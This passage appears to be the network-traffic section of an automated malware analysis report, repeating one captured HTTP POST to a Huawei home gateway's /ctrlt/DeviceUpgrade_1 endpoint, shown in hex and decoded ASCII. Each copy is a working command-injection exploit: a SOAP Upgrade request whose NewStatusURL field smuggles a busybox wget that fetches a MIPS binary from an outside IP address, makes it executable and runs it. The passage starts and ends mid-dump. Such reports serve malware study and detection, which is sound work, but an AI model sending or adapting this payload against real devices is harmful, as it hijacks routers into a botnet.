20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 